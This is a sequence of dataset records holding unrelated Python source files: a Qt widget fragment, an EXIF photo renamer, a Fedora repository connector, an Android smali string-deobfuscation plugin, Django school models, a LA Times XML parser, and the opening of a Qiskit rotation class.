QtWidgets.QHBoxLayout()\n box.addWidget(setTrueButton)\n box.addWidget(setFalseButton)\n \n form = QtWidgets.QFormLayout()\n form.addRow(label)\n form.addRow(box)\n \n self.setLayout( form )\n \n def setTrue( self, is_right ):\n if is_right:\n self.main_obj.is_simple = True\n else:\n self.main_obj.is_simple = False\n self.is_changed.emit()\n","sub_path":"src/gui/MainWindow/MainRadioButton.py","file_name":"MainRadioButton.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"521008486","text":"import glob\nimport os\nimport traceback\nfrom PIL import ExifTags, Image\n\n\n# WORK_DIR = '/storage/emulated/0/DCIM/Camera'\n# WORK_DIR = 'D:\\\\Pictures\\\\Sony Z1'\nWORK_DIR = os.path.dirname(__file__)\nJPG_FILTER = os.path.join(WORK_DIR, '*.[jJ][pP][gG]')\n\n\ndef get_exif_time(file):\n img = Image.open(file)\n date_time = ''\n try:\n exif = {\n ExifTags.TAGS[k]: v\n for k, v in img._getexif().items()\n if k in ExifTags.TAGS\n }\n date_time = exif['DateTime']\n except Exception as err:\n print(err)\n print(traceback.format_exc())\n date_time = date_time.replace(':', '').replace(' ', '_').strip()\n return date_time\n\n\ndef rename_jpg(file, date_time):\n new_name = 'IMG_' + date_time + '.jpg'\n new_name = os.path.join(WORK_DIR, new_name)\n i = 1\n while os.path.exists(new_name):\n if file.lower() == new_name.lower():\n return 'Not Renamed'\n new_name = 'IMG_' + date_time + '_' + str(i) + '.jpg'\n new_name = os.path.join(WORK_DIR, new_name)\n i += 1\n try:\n os.rename(file, new_name)\n except Exception as err:\n print(err)\n print(traceback.format_exc())\n return 'ERROR'\n return os.path.split(new_name)[1]\n\n\ndef rename_jpgs():\n filecount = 0\n filetotal = len(glob.glob(JPG_FILTER))\n for file in glob.glob(JPG_FILTER):\n filecount += 1\n date_time = get_exif_time(file)\n if date_time == '':\n print(os.path.split(file)[1], 'No Exif Date', '(%d/%d)' % (filecount, filetotal))\n else:\n new_name = rename_jpg(file, date_time)\n print(os.path.split(file)[1], '-->', new_name, '(%d/%d)' % (filecount, filetotal))\n\n\nif __name__ == '__main__':\n rename_jpgs()\n","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"347907043","text":"import cherrypy\nimport logging\nimport requests\n\nfrom itertools import chain\nfrom os.path import basename\nfrom rdflib import Graph, URIRef, Literal\n\nfrom combine.config.datasources import lake_rest_api\nfrom combine.connectors.http_connector import HttpConnector\nfrom combine.config.namespaces import ns_collection as nsc\nfrom combine.config.namespaces import ns_mgr as nsm\n\nclass LakeConnector(HttpConnector):\n '''@package combine.connectors\n\n Handles communication with the LAKE (Fedora) REST API.\n '''\n _logger = logging.getLogger(__module__)\n\n\n @property\n def conf(self):\n '''LAKE host configuration.\n\n @return dict\n '''\n\n return lake_rest_api\n\n\n def __init__(self):\n '''Class constructor.\n\n Set authorization parameters based on incoming auth headers.\n\n @return None\n '''\n self.auth = requests.auth.HTTPBasicAuth(*self.conf['auth']) \\\n if 'auth' in self.conf else None\n\n\n def post_ldpr(self, parent='/', g=None, slug=None):\n '''Create a new LDP resource via POST.\n\n @param parent (string) Parent path relative to repository root.\n @param g (rdflib.graph.Graph) Graph of properties to populate resource.\n @param slug (string) Path relative to REST API root.\n\n @return string Location of new 
resource.\n '''\n self.headers['slug'] = slug\n self.headers['content-type'] = 'text/turtle'\n self._logger.debug('Sending RDF graph: {}'.format(g.serialize(None, 'turtle')))\n\n res = self.request('post', self.conf['base_url'] + parent,\n auth=self.auth, headers=self.headers,\n verify=self.conf['ssl_verify'],\n data=g.serialize(None, 'turtle'))\n\n loc = res.headers['location']\n self._logger.info('Ingested resource with POST at: {}'.format(loc))\n\n return loc\n\n\n def put_ldpr(self, uri, g=None):\n '''Create or update an LDP resource via PUT.\n\n @param uri (string) resource URI.\n @param g (rdflib.graph.Graph) Graph of properties to populate resource.\n\n @return string Location of new resource.\n '''\n g = g or Graph()\n\n #g.add((URIRef(''), nsc['rdf'].type, URIRef(nsc['fedora'].Resource)))\n #g.add((URIRef(''), nsc['rdf'].type, URIRef(nsc['ldp'].RDFSource)))\n\n self._logger.debug('Graph sent for LDPR creation: {}'.\n format(g.serialize(format='turtle')))\n\n self.headers['content-type'] = 'text/turtle'\n self._logger.debug('Sending RDF graph: {}'.format(\n g.serialize(None, 'turtle')))\n\n res = self.request('put', uri,\n auth=self.auth, headers=self.headers,\n verify=self.conf['ssl_verify'],\n data=g.serialize(None, 'turtle'))\n\n loc = res.headers['location']\n self._logger.info('Ingested resource with PUT at: {}'.format(loc))\n\n return loc\n\n\n def patch_ldpr(self, uri, q=None):\n '''Patch an existing LDP resource with a SPARQL-Update query.\n\n @param q (string) SPARQL-Update query.\n @param uri (string) Resource URI.\n\n @return None\n '''\n self.headers['content-type'] = 'application/sparql-update'\n\n res = self.request('patch', uri, auth=self.auth,\n verify=self.conf['ssl_verify'], headers=self.headers,\n data=bytes(q, 'utf-8'))\n\n return res\n\n\n def put_ldpc(self, uri, g=None,\n mm_res=None, mm_rel=None, ins_cont_rel=None):\n '''Create or update an LDP basic, direct or indirect container via\n PUT.\n\n @param uri (string) resource URI.\n @param g (rdflib.graph.Graph) Graph of properties to populate resource.\n @param mm_res (string) URI of membership subject.\n @param mm_rel (string) URI of membership relation. If both this and\n mm_res are set, the resource is considered a direct container.\n @param ins_cont_rel (string) URI of inserted content relation. If this,\n mm_res and mm_rel are set, the resource is an indirect container.\n\n @return string Location of new resource.\n '''\n g = g or Graph()\n if mm_res and mm_rel:\n if ins_cont_rel:\n ctype = URIRef(nsc['ldp'].IndirectContainer)\n g.add((URIRef(''), nsc['ldp'].insertedContentRelation,\n ins_cont_rel))\n g.add((URIRef(''), nsc['fedorasystem'].hasModel,\n Literal('ActiveFedora::IndirectContainer',\n datatype=nsc['xsd'].string)))\n else:\n ctype = URIRef(nsc['ldp'].DirectContainer)\n\n g.add((URIRef(''), nsc['ldp'].membershipResource, mm_res))\n g.add((URIRef(''), nsc['ldp'].hasMemberRelation, mm_rel))\n g.add((URIRef(''), nsc['rdf'].type,\n URIRef(nsc['aic'].CitiResource)))\n g.add((URIRef(''), nsc['rdf'].type, ctype))\n\n #g.add((URIRef(''), nsc['rdf'].type, URIRef(nsc['fedora'].Container)))\n #g.add((URIRef(''), nsc['rdf'].type, URIRef(nsc['ldp'].Container)))\n\n return self.put_ldpr(uri, g)\n\n\n def assert_res_exists(self, uri):\n '''Check if a resource exists already.\n\n @param uri (string) URI to check.\n\n @return (boolean) Whether node exists.\n\n @throw HTTPError If the request is invalid (i.e. 
any other HTTP\n error than 404)\n '''\n\n try:\n res = self.request('head', uri, auth=self.auth,\n headers=self.headers, verify=self.conf['ssl_verify'])\n return True\n except requests.exceptions.HTTPError as e:\n if str(e)[:3] == '404':\n return False\n else:\n raise\n\n\n def open_transaction(self):\n '''Open Fedora transaction.\n\n @return (string) The transaction URI.\n '''\n\n res = self.request(\n 'post',\n self.conf['base_url'] + '/fcr:tx',\n headers = self.headers\n )\n res.raise_for_status()\n\n return res.headers['location']\n\n\n def get_binary_stream(self, uri):\n '''Get a binary stream.'''\n\n res = self.request('get',uri, headers=self.headers)\n res.raise_for_status()\n\n return res\n\n\n def create_or_update_node(self, uri=None, parent='/', props=None):\n '''Create a container node if it does not exist,\n or update it if it exists already.\n\n @param uri (string, optional) URI of the node to be created or updated.\n @param parent (string, optional) Parent path relative to\n repository root. Default is '/'.\n @param props (dict, optional) Dictionary of properties to be\n associated with the node.\n\n @return (string) New node URI.\n '''\n if props:\n g = Graph(namespace_manager=nsm)\n cherrypy.log('Received prop tuples: {}'.format(props))\n for t in props['tuples'][1]:\n g.add((URIRef(''), t[0], t[1]))\n\n body = g.serialize(format='turtle')\n else:\n body = ''\n\n if uri:\n res = self.request('put',\n uri,\n data = body,\n headers = dict(chain(self.headers.items(),\n [('Content-type', 'text/turtle')]\n ))\n )\n else:\n cherrypy.log('Creating node by POST with RDF properties: {}'.\\\n format(body))\n res = self.request('post',\n parent,\n data = body,\n headers = dict(chain(self.headers.items(),\n [('Content-type', 'text/turtle')]\n ))\n )\n if res.status_code > 399:\n cherrypy.log('HTTP Error: {}'.format(res.text))\n res.raise_for_status()\n\n return res.headers['location']\n\n\n def create_or_update_datastream(\n self, uri, file_name, ds=None, path=None,\n mimetype='application/octet-stream'):\n '''Create a datastream under an existing container\n node if it does not exist, or update it if it exists already.\n\n @param uri (string) URI of the datastream node to be created or updated.\n @param file_name (string) Name of the datastream as a downloaded file.\n @param ds (BytesIO, optional) Datastream to be ingested.\n Alternative to \\p path.\n @param path (string, optional) Path to the datastream.\n Alternative to \\p ds.\n @param mimetype (string, optional) MIME type of the datastream.\n Default: application/octet-stream\n\n @return (string | None) New node URI if a new node is created.\n '''\n\n # @TODO Optimize with with\n if not ds and not path:\n raise cherrypy.HTTPError(\n '500 Internal Server Error', \"No datastream or file path given.\"\n )\n\n data = ds or open(path, 'rb')\n #cherrypy.log('Data peek: {}'.format(data))\n\n cherrypy.log('Ingesting datastream from class type: {}'\\\n .format(data.__class__.__name__))\n res = self.request('put',\n uri,\n data = data.read(),\n headers = dict(chain(\n self.headers.items(),\n [\n ('content-disposition', 'inline; filename=\"' + file_name + '\"'),\n ('content-type', mimetype),\n ]\n ))\n )\n #cherrypy.log('Request headers: {}'.format(res.request.headers))\n #cherrypy.log('Response headers: {}'.format(res.headers))\n res.raise_for_status()\n\n if 'location' in res.headers:\n return res.headers['location']\n\n\n def create_or_update_ref_datastream(self, uri, ref):\n '''Create or update a datastream with an externally 
referenced content.\n\n @param uri (string) URI of the datastream node to be created or updated.\n @param ref (string) External source as a HTTP URL.\n\n @return (string) New datastream URI if a new one is created.\n '''\n\n cherrypy.log('Creating an externally referenced node: ' + uri)\n # Check that external reference exists\n check = self.request('head', ref, headers=self.headers)\n check.raise_for_status()\n\n res = self.request('put',\n uri,\n headers = dict(chain(\n self.headers.items(),\n [('content-type', 'message/external-body; access-type=URL; URL=\"{}\"'.format(ref))]\n ))\n )\n res.raise_for_status()\n\n #cherrypy.log('Create/update datastream response:' + str(res.status_code))\n\n if 'location' in res.headers:\n return res.headers['location']\n\n\n def update_node_properties(self, uri, delete_props=[], insert_props=[], where_props=[]):\n '''Update the properties of an existing node from a set of insert, delete\n and where tuples formatted by Node::_build_prop_tuples .\n\n @param uri (string) Node URI.\n @param delete_props (dict) Properties to be deleted.\n If the value of a property is a tuple or a list, the specific value(s) will be deleted.\n If it is an empty string (\"\"), the whole property and its values are deleted.\n @param insert_props (dict) Properties to be inserted.\n Keys are property names, values are tuples or lists of values.\n Non-empty strings can be used as single values.\n @param where_props (dict) Conditions. Same syntax as @p insert_props.\n\n @return (boolean) True on success.\n '''\n if not delete_props and not insert_props:\n cherrypy.log('Not received any properties to update.')\n return False\n\n cherrypy.log(\"URI: {}\\nDelete props: {}\\nInsert props: {}\\nwhere props: {}\".format(\n uri, delete_props, insert_props, where_props\n ))\n insert_triples, delete_triples = ('','')\n where_triples_list = []\n\n for d in delete_props:\n delete_triples += '\\n\\t<> {} {} .'.format(d[0].n3(), d[1].n3())\n\n for i in insert_props:\n insert_triples += '\\n\\t<> {} {} .'.format(i[0].n3(), i[1].n3())\n\n for w in where_props:\n where_triples_list.append('\\n\\t{{<> {} {}}}'.\\\n format(w[0].n3(), w[1].n3()))\n where_triples = '\\n\\tUNION'.join(where_triples_list)\n\n body = 'DELETE {{{}\\n}} INSERT {{{}\\n}} WHERE {{{}\\n}}'\\\n .format(delete_triples, insert_triples, where_triples)\n cherrypy.log.error('Executing SPARQL update: ' + body)\n\n res = self.request('patch',\n uri,\n data = body.encode('utf-8'),\n headers = dict(chain(self.headers.items(),\n [('Content-type', 'application/sparql-update')]\n ))\n )\n #if res.status_code > 399:\n # cherrypy.log('HTTP Error: {}'.format(res.text))\n res.raise_for_status()\n\n return True\n\n\n def commit_transaction(self, tx_uri):\n '''Commit an open transaction.\n\n @param tx_uri The full transaction URI.\n\n @return (boolean) True on success.\n '''\n cherrypy.log.error('Committing transaction: {}'.\\\n format(tx_uri.split('tx:')[-1]))\n res = self.request('post',\n tx_uri + '/fcr:tx/fcr:commit',\n headers=self.headers\n )\n res.raise_for_status()\n\n return True\n\n\n def rollback_transaction(self, tx_uri):\n '''Roll back an open transaction.\n\n @param tx_uri The full transaction URI.\n\n @return (boolean) True on success.\n '''\n cherrypy.log.error('Rolling back transaction: {}'.\\\n format(tx_uri.split('tx:')[-1]))\n res = self.request('post',\n tx_uri + '/fcr:tx/fcr:rollback',\n headers=self.headers\n )\n res.raise_for_status()\n\n return 
True\n ","sub_path":"combine/connectors/lake_connector.py","file_name":"lake_connector.py","file_ext":"py","file_size_in_byte":13959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"444980604","text":"# coding:utf-8\r\n'''\r\n Plugin responsibilities:\r\n\r\n 1. Use regular expressions to match the code regions that need decryption\r\n 2. Parse each code region into class, method and arguments:\r\n [{'className':'', 'methodName':'', 'arguments':'', 'id':''}]\r\n 3. Generate the JSON format and add a region ID (hash)\r\n\r\n'''\r\n\r\nfrom json import JSONEncoder\r\nimport tempfile\r\nimport os\r\nimport hashlib\r\nimport re\r\n\r\n\r\nclass Plugin(object):\r\n name = 'Plugin'\r\n description = ''\r\n version = ''\r\n\r\n # const/16 v2, 0x1a\r\n CONST_NUMBER = 'const(?:\\/\\d+) [vp]\\d+, (-?0x[a-f\\d]+)\\s+'\r\n # ESCAPE_STRING = '''\"(.*?)(?<!\\\\)\"'''\r\n # move-result-object v2\r\n MOVE_RESULT_OBJECT = 'move-result-object ([vp]\\d+)'\r\n\r\n def get_invoke_pattern(self, args):\r\n # Pattern for a static String-returning decryption call; the definition was\r\n # damaged in this record and is reconstructed from get_clz_mtd_name below.\r\n return 'invoke-static.*?{.*?}, (.*?);->([^\\(]+\\(%s\\))Ljava/lang/String;\\s+' % args\r\n\r\n def get_class_name(self, line):\r\n start = line.index('}, L')\r\n end = line.index(';->')\r\n return line[start + 4:end].replace('/', '.')\r\n\r\n def get_method_name(self, line):\r\n end = line.index(';->')\r\n args_index = line.index('(')\r\n return line[end + 3:args_index]\r\n\r\n def get_clz_mtd_name(self, line):\r\n clz_name, mtd_name = re.search('invoke-static.*?{.*?}, (.*?);->(.*?)\\(.*?\\)Ljava/lang/String;', line).groups()\r\n clz_name = clz_name[1:].replace('/', '.')\r\n return (clz_name, mtd_name)\r\n\r\n def get_clz_mtd_rtn_name(self, line):\r\n '''\r\n class_name, method_name, return_variable_name\r\n '''\r\n clz_name, mtd_name = re.search('invoke-static.*?{.*?}, (.*?);->(.*?)\\(.*?\\)Ljava/lang/String;', line).groups()\r\n clz_name = clz_name[1:].replace('/', '.')\r\n\r\n prog = re.compile(self.MOVE_RESULT_OBJECT)\r\n mro_statement = prog.search(line).group()\r\n rtn_name = mro_statement[mro_statement.rindex(' ') + 1:]\r\n return (clz_name, mtd_name, rtn_name)\r\n\r\n def get_arguments(self, mtd_body, line, proto):\r\n '''\r\n Extract the arguments for the given prototype\r\n '''\r\n args = []\r\n if proto == '[B':\r\n ptn1 = re.compile(':array_[\\w\\d]+')\r\n array_data_name = ptn1.search(line).group()\r\n ptn2 = re.compile('\\s+' + array_data_name + '\\s+.array-data 1\\s+' + '[\\w\\s]+' + '.end array-data')\r\n\r\n result = ptn2.search(mtd_body)\r\n if result:\r\n array_data_context = result.group()\r\n byte_arr = []\r\n for item in array_data_context.split()[3:-2]:\r\n byte_arr.append(eval(item[:-1]))\r\n args.append(proto + ':' + str(byte_arr))\r\n elif proto == '[I':\r\n ptn1 = re.compile(':array_[\\w\\d]+')\r\n array_data_name = ptn1.search(line).group()\r\n ptn2 = re.compile('\\s+' + array_data_name + '\\s+.array-data \\d\\s+' + '[-\\w\\s]+' + '.end array-data')\r\n\r\n result = ptn2.search(mtd_body)\r\n if result:\r\n array_data_context = result.group()\r\n byte_arr = []\r\n for item in array_data_context.split()[3:-2]:\r\n byte_arr.append(eval(item))\r\n args.append(proto + ':' + str(byte_arr))\r\n elif proto == 'java.lang.String':\r\n const_str = re.findall(\"\\\".+\", line)[-1]\r\n arg1 = []\r\n for item in const_str[1:-1].encode(\"UTF-8\"):\r\n arg1.append(item)\r\n args.append(\"java.lang.String:\" + str(arg1))\r\n elif proto in ['I', 'II', 'III']:\r\n prog2 = re.compile(self.CONST_NUMBER)\r\n args = []\r\n for item in prog2.finditer(line):\r\n cn = item.group().split(\", \")\r\n args.append('I:' + str(eval(cn[1].strip())))\r\n return args\r\n\r\n def get_return_variable_name(self, line):\r\n p3 = re.compile(self.MOVE_RESULT_OBJECT)\r\n mro_statement = p3.search(line).group()\r\n return mro_statement[mro_statement.rindex(' ') + 1:]\r\n\r\n def get_json_item(self, cls_name, mtd_name, args):\r\n 
'''\r\n Build a decryption target item\r\n '''\r\n item = {'className': cls_name, 'methodName': mtd_name, 'arguments': args}\r\n ID = hashlib.sha256(JSONEncoder().encode(item).encode('utf-8')).hexdigest()\r\n item['id'] = ID\r\n return item\r\n\r\n\r\n def append_json_item(self, json_item, mtd, line, return_variable_name):\r\n '''\r\n Append the item to json_list and target_contexts\r\n '''\r\n mid = json_item['id']\r\n if mid not in self.target_contexts.keys():\r\n self.target_contexts[mid] = [(mtd, line, '\\n\\n const-string %s, ' % return_variable_name)]\r\n else:\r\n self.target_contexts[mid].append((mtd, line, '\\n\\n const-string %s, ' % return_variable_name))\r\n\r\n if json_item not in self.json_list:\r\n self.json_list.append(json_item)\r\n\r\n\r\n def __init__(self, driver, methods, smali_files):\r\n self.make_changes = False\r\n self.driver = driver\r\n self.methods = methods\r\n self.smali_files = smali_files\r\n\r\n def run(self):\r\n '''\r\n Match the code and generate a file in the expected format\r\n (containing class name, method and arguments)\r\n '''\r\n pass\r\n\r\n def optimize(self):\r\n '''\r\n Duplicated code, consider removing it.\r\n Generate the JSON, run the decryption driver,\r\n update the method bodies in memory and write the files.\r\n '''\r\n if not self.json_list or not self.target_contexts:\r\n return\r\n\r\n jsons = JSONEncoder().encode(self.json_list)\r\n\r\n with tempfile.NamedTemporaryFile(mode='w+', delete=False) as fp:\r\n fp.write(jsons)\r\n outputs = self.driver.decode(fp.name)\r\n os.unlink(fp.name)\r\n\r\n # Replace the targets in memory;\r\n # outputs holds the decrypted results.\r\n for key in outputs:\r\n if 'success' in outputs[key]:\r\n if key not in self.target_contexts.keys():\r\n print('not found', key)\r\n continue\r\n for item in self.target_contexts[key]:\r\n old_body = item[0].body\r\n target_context = item[1]\r\n new_context = item[2] + outputs[key][1]\r\n\r\n # It's not a string.\r\n if 'null' == outputs[key][1]:\r\n continue\r\n item[0].body = old_body.replace(target_context, new_context)\r\n item[0].modified = True\r\n self.make_changes = True\r\n\r\n self.smali_files_update()\r\n\r\n def optimizations(self, json_list, target_contexts):\r\n '''\r\n Duplicated code, consider removing it.\r\n Generate the JSON, run the decryption driver,\r\n update the method bodies in memory and write the files.\r\n '''\r\n if not json_list or not target_contexts:\r\n return\r\n\r\n jsons = JSONEncoder().encode(json_list)\r\n\r\n with tempfile.NamedTemporaryFile(mode='w+', delete=False) as fp:\r\n fp.write(jsons)\r\n outputs = self.driver.decode(fp.name)\r\n os.unlink(fp.name)\r\n\r\n # print(outputs)\r\n\r\n # Replace the targets in memory;\r\n # outputs holds the decrypted results.\r\n for key in outputs:\r\n if 'success' in outputs[key]:\r\n if key not in target_contexts.keys():\r\n print('not found', key)\r\n continue\r\n for item in target_contexts[key]:\r\n old_body = item[0].body\r\n target_context = item[1]\r\n new_context = item[2] + outputs[key][1]\r\n\r\n # It's not a string.\r\n if 'null' == outputs[key][1]:\r\n continue\r\n item[0].body = old_body.replace(target_context, new_context)\r\n item[0].modified = True\r\n self.make_changes = True\r\n\r\n self.smali_files_update()\r\n\r\n def smali_files_update(self):\r\n '''\r\n write changes to smali files\r\n '''\r\n if self.make_changes:\r\n for smali_file in self.smali_files:\r\n smali_file.update()\r\n","sub_path":"libs/dexsim/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":8997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"229731492","text":"from django.db import models\nfrom common.models import SaveDeleteMixin, checkRequiredFieldsNotNone\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\n\nimport re\n\n# **********MODELS**********\n\nclass School(SaveDeleteMixin, 
models.Model):\n # Foreign keys\n # Creation and update time\n creationDateTime = models.DateTimeField('Creation date',auto_now_add=True)\n updatedDateTime = models.DateTimeField('Last modified date',auto_now=True)\n # Fields\n name = models.CharField('Name', max_length=100, unique=True)\n abbreviation = models.CharField('Abbreviation', max_length=5, unique=True, help_text=\"Abbreviation is used in the schedule and scoring system\")\n # Details\n state = models.ForeignKey('regions.State', verbose_name='State', on_delete=models.PROTECT, null=True, limit_choices_to={'typeRegistration': True}) # Needed because null on initial data import\n region = models.ForeignKey('regions.Region', verbose_name='Region', on_delete=models.PROTECT, null=True)\n postcode = models.CharField('Postcode', max_length=4, null=True, blank=True)\n # Flags\n forceSchoolDetailsUpdate = models.BooleanField('Force details update', default=False)\n\n # *****Meta and clean*****\n class Meta:\n verbose_name = 'School'\n ordering = ['name']\n\n def clean(self):\n errors = []\n\n # Check min length of abbreviation\n if not self.abbreviation or len(self.abbreviation) < 3:\n errors.append(ValidationError('Abbreviation must be at least three characters'))\n\n # Case insenstive abbreviation and name unique check\n if School.objects.filter(name__iexact=self.name).exclude(pk=self.pk).exists():\n errors.append(ValidationError('School with this name exists. Please ask your school administrator to add you.'))\n\n if School.objects.filter(abbreviation__iexact=self.abbreviation).exclude(pk=self.pk).exists():\n errors.append(ValidationError('School with this abbreviation exists. Please ask your school administrator to add you.'))\n\n # Validate school not using name or abbreviation reserved for independent entries\n if self.abbreviation.upper() == 'IND':\n errors.append(ValidationError('IND is reserved for independent entries. If you are an independent entry, you do not need to create a school.'))\n\n # TODO: use regex to catch similar\n if self.name.upper() == 'INDEPENDENT':\n errors.append(ValidationError('Independent is reserved for independent entries. 
If you are an independent entry, you do not need to create a school.'))\n\n # Validate postcode\n if self.postcode is not None:\n if not re.match(r\"(^[0-9]+$)\", self.postcode):\n errors.append(ValidationError('Postcode must be numeric'))\n\n if len(self.postcode) < 4:\n errors.append(ValidationError('Postcode too short'))\n\n # Validate region state\n if self.region and self.region.state is not None and self.region.state != self.state:\n errors.append(ValidationError(\"Region not valid for selected state\"))\n\n # Raise any errors\n if errors:\n raise ValidationError(errors)\n\n # *****Permissions*****\n @classmethod\n def stateCoordinatorPermissions(cls, level):\n if level in ['full', 'schoolmanager']:\n return [\n 'add',\n 'view',\n 'change',\n 'delete'\n ]\n elif level in ['viewall', 'billingmanager', 'eventmanager']:\n return [\n 'view',\n ]\n \n return []\n\n # Used in state coordinator permission checking\n def getState(self):\n return self.state\n\n # *****Save & Delete Methods*****\n\n def preSave(self):\n self.abbreviation = self.abbreviation.upper()\n\n # *****Methods*****\n\n # *****Get Methods*****\n\n def __str__(self):\n return self.name\n\n # *****CSV export methods*****\n\n # *****Email methods*****\n\nclass Campus(models.Model):\n # Foreign keys\n school = models.ForeignKey(School, verbose_name='School', on_delete=models.CASCADE)\n # Creation and update time\n creationDateTime = models.DateTimeField('Creation date',auto_now_add=True)\n updatedDateTime = models.DateTimeField('Last modified date',auto_now=True)\n # Fields\n name = models.CharField('Name', max_length=100)\n postcode = models.CharField('Postcode', max_length=4, null=True, blank=True)\n\n # *****Meta and clean*****\n class Meta:\n verbose_name = 'Campus'\n verbose_name_plural = 'Campuses'\n ordering = ['school', 'name']\n unique_together = ('school', 'name')\n\n def clean(self):\n errors = []\n\n # Validate postcode\n if self.postcode is not None:\n if not re.match(r\"(^[0-9]+$)\", self.postcode):\n errors.append(ValidationError('Postcode must be numeric'))\n\n if len(self.postcode) < 4:\n errors.append(ValidationError('Postcode too short'))\n\n # Raise any errors\n if errors:\n raise ValidationError(errors)\n\n # *****Permissions*****\n @classmethod\n def stateCoordinatorPermissions(cls, level):\n return School.stateCoordinatorPermissions(level)\n\n # Used in state coordinator permission checking\n def getState(self):\n return self.school.state\n\n # *****Save & Delete Methods*****\n\n # *****Methods*****\n\n # *****Get Methods*****\n\n def __str__(self):\n return f'{self.name}'\n\n # *****CSV export methods*****\n\n # *****Email methods***** \n\nclass SchoolAdministrator(SaveDeleteMixin, models.Model):\n # Foreign keys\n school = models.ForeignKey(School, verbose_name='School', on_delete=models.CASCADE)\n campus = models.ForeignKey(Campus, verbose_name='Campus', on_delete=models.SET_NULL, null=True, blank=True)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name='User', on_delete=models.PROTECT)\n # Creation and update time\n creationDateTime = models.DateTimeField('Creation date',auto_now_add=True)\n updatedDateTime = models.DateTimeField('Last modified date',auto_now=True)\n # Fields\n\n # *****Meta and clean*****\n class Meta:\n verbose_name = 'School administrator'\n unique_together = ('school', 'user')\n ordering = ['user']\n\n def clean(self):\n checkRequiredFieldsNotNone(self, ['school', 'user'])\n # Check campus school matches school on this object\n if self.campus and 
self.campus.school != self.school:\n raise ValidationError('Campus school must match school')\n\n # *****Permissions*****\n @classmethod\n def stateCoordinatorPermissions(cls, level):\n return School.stateCoordinatorPermissions(level)\n\n # Used in state coordinator permission checking\n def getState(self):\n return self.school.state\n\n # *****Save & Delete Methods*****\n\n def preSave(self):\n if self.pk:\n self.previousUser = SchoolAdministrator.objects.get(pk=self.pk).user\n self.previousSchool = SchoolAdministrator.objects.get(pk=self.pk).school\n\n def postSave(self):\n # Set currently selected school if not set\n if self.user.currentlySelectedSchool is None or (hasattr(self, 'previousSchool') and self.user.currentlySelectedSchool == self.previousSchool):\n self.user.currentlySelectedSchool = self.school\n self.user.save(update_fields=['currentlySelectedSchool'])\n\n if hasattr(self, 'previousUser') and self.user != self.previousUser:\n self.previousUser.setCurrentlySelectedSchool()\n\n # *****Methods*****\n\n # *****Get Methods*****\n\n def userName(self):\n return self.user.fullname_or_email()\n userName.short_description = 'User'\n userName.admin_order_field = 'user'\n\n def userEmail(self):\n return self.user.email\n userEmail.short_description = 'User email'\n userEmail.admin_order_field = 'user__email'\n\n def __str__(self):\n return f'{self.school}: {self.user.fullname_or_email()}'\n\n # *****CSV export methods*****\n\n # *****Email methods*****\n","sub_path":"rcjaRegistration/schools/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"336265221","text":"\"\"\" \n\nContext : SRP\nModule : Pipeline.py\nVersion : 1.0.0\nAuthor : Stefano Covino\nDate : 20/11/2010\nE-mail : stefano.covino@brera.inaf.it\nURL : http://www.merate.mi.astro.it/utenti/covino\n\nUsage : to be imported\n\nRemarks :\n\nHistory : (20/11/2010) First version.\n\n\"\"\"\n\n\n\n\ndef LoadProcessPointFName (fname):\n value = None\n try:\n f = open(fname)\n dt = f.readlines()\n f.close()\n except IOError:\n return None\n #\n try:\n valueross = int(dt[0].split()[0])\n valueremir = int(dt[0].split()[1])\n except (ValueError, IndexError):\n return None\n #\n return valueross, valueremir\n","sub_path":"python/SRPAstro/SRP.SRPPipelines.REM/build/lib/SRP/SRPPipelines/REM/LoadProcessPointFName.py","file_name":"LoadProcessPointFName.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"276440679","text":"from xml.etree import ElementTree\nimport re\nimport json\nimport os\n\n\ndef read_docs(path) -> str:\n with open(path) as f:\n raw = f.read()\n # Wrap the concatenated DOC elements in a single root element so that\n # ElementTree.fromstring() can parse the file (the tag name is arbitrary).\n raw = f\"<root>{raw}</root>\"\n return raw\n\n\ndef parse_doc(xml: str) -> None:\n xml = re.sub('', '', xml).strip()\n xml = re.sub('&[^>]*;', ' ', xml).strip()\n\n docs = []\n\n root = ElementTree.fromstring(xml)\n doc: ElementTree.Element\n for doc in root:\n doc_id = doc.find('DOCNO').text.strip()\n text = ''\n try:\n # LA\n text = \"\".join(doc.find('TEXT').itertext()).strip()\n except AttributeError:\n pass\n\n docs.append(\n {doc_id: text}\n )\n\n with open('./index_pre/' + doc_id, 'w', encoding='utf-8') as f:\n json.dump(docs, f, ensure_ascii=False, indent=4)\n\n\nif __name__ == '__main__':\n p = './disk5/LATIMES/LA/'\n for fp in os.listdir(p):\n if fp.startswith(\"LA\"):\n print(f'processing {fp}')\n parse_doc(read_docs(p + 
fp))\n\n\n\n\n\n\n","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"188141903","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2018 IBM.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# =============================================================================\nfrom qiskit.aqua.utils import CircuitFactory\nfrom qiskit.aqua.circuits.gates import cry\nimport numpy as np\n\n\nclass LinearYRotation(CircuitFactory):\n \"\"\"\n Linearly-controlled Y rotation.\n For a register of state qubits |x> and a target qubit |0> this operator acts as:\n\n |x>|0> --> |x>( 